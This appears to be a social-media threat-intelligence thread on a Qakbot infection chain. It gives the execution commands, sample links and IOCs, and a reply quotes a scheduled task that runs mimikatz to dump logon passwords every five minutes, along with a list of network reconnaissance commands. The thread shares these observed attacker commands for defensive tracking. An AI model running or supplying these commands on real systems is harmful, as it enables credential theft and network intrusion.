pr0xylifeNov 21, 2022

#Qakbot - BB07 - url > .zip > .zip > .iso > .js > .dll

wscript.exe C:\Users\**\AppData\Local\Temp\JG.js

regsvr32.exe almond\lemur.temp

Samples 👇

https://bazaar.abuse.ch/sample/a977ba1c34215867748e450f5323ec6938f45e532b756f9c623e448670d0aa2b/

https://bazaar.abuse.ch/sample/3b00174d5b42adf5da7fe896ce8baae14d67c52f79c49eed82bdf87e3a28d625/

https://bazaar.abuse.ch/sample/3c0c4314624497645c426ed6e9fbfd37042f7aceb51e60a894135ea4a42851c0/

IOC's
https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB07_21.11.2022.txt

MalwareBazaar | Checking your browser

Show threadAcquiredsec

@pr0xylife

#qakbot #qbot #malware
Seeing the same scheduled task that runs mimikitteh getting created as last week.

schtasks /create /f /sc minute /mo 5 /tn GameOver /tr "C:\TMP\mim.exe sekurlsa::LogonPasswords > C:\TMP\o.txt"

Also runs all this:

net view
cmd /c set
arp -a
ipconfig /all
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.WORKGROUP
net share
route print
netstat -nao
net localgroup
localgroup
whoami /all

Nov 21, 2022 at 4:15pmWeb